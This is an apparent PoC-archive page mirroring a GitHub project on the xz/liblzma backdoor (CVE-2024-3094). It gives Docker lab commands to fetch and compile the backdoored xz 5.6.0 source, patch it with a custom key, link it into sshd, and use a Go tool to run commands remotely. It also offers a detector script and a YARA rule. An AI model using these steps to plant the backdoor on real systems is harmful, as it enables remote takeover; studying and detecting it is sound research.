Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-3094 PoC — Xz: malicious code in distributed source

Source
https://github.com/valeriot30/cve-2024-3094
Associated Vulnerability
Title:Xz: malicious code in distributed source (CVE-2024-3094)
Description:Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.
Description
A XZ backdoor vulnerability explained in details
Readme
# 🛡️ Cybersecurity Project: Analyzing the XZ Backdoor in liblzma

  

## 📄 Overview

  

This project analyzes the high-profile backdoor discovered in **xz-utils (liblzma)**, affecting versions **5.6.0** and **5.6.1**. The malicious code introduced into the upstream build system targeted SSH authentication by modifying how `sshd` interacts with the LZMA compression library at runtime.

  

> ⚠️ This project is for **educational and defensive research** purposes only.

  

# Vulnerable machine

Clone this repository

    git clone https://github.com/valeriot30/cve-2024-3094

Navigate to the directory 

	cd cve-2024-3094

Spawn the docker container

	docker build -t fedora-dev .
	docker run --privileged -it --rm -p 2222:22 fedora-dev
	

Get a malicious version of the library  

    cd ~  
    git clone https://github.com/thesamesam/xz-archive.git  
    cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )  
    tar xzf xz-5.6.0.tar.gz  
    mv xz-5.6.0 ~

Export the build target

    export RPM_ARCH=$(uname -m)

Compile the malicious library

    cd ~
     cd ./xz-5.6.0/  
    ./configure
    make -j 8

Copy the malicious SO outside:

    cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

Clone again the repository inside the container

    git clone https://github.com/valeriot30/cve-2024-3094

Patch the liblzma library with a custom key

	 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

Link the malicious library in the system

	 sh cve-2024-3094/inject.sh

Run the sshd linked with the malicious library

	 env -i LANG=C /usr/sbin/sshd -D &

# Attacker machine

Clone this repository

    git clone https://github.com/valeriot30/cve-2024-3094


Navigate to the directory 

	cd cve-2024-3094


Compile the GO Tool

    go build


Use the tool by inserting vulnerable machine IP address and the command to execute

    ./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'


# Counter-Measures

## Using the detector

Run the detector

    sh detector.sh

## Using Yara

Use the yara matching rules

    yara rule.yar ../liblzma.so.5.6.0 -s
File Snapshot

 [4.0K]  /data/pocs/b4f00e04447c7425f3520641ccebc1365b93a457
├── [4.0K]  assets
│   ├── [242K]  liblzma.so.5.6.0
│   └── [242K]  liblzma.so.5.6.0.patch
├── [5.7M]  bot
├── [4.1K]  bot.go
├── [ 620]  configure.sh
├── [ 433]  detector.sh
├── [ 522]  Dockerfile
├── [ 771]  generator.py
├── [ 165]  go.mod
├── [ 558]  go.sum
├── [ 208]  inject.sh
├── [242K]  liblzma.so.5.6.0.patch
├── [2.1K]  patch_libzma.py
├── [1.5K]  patch.py
├── [2.0K]  README.md
├── [  50]  requirements.txt
├── [7.7K]  reverse_shell.py
└── [ 670]  rule.yar

1 directory, 18 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →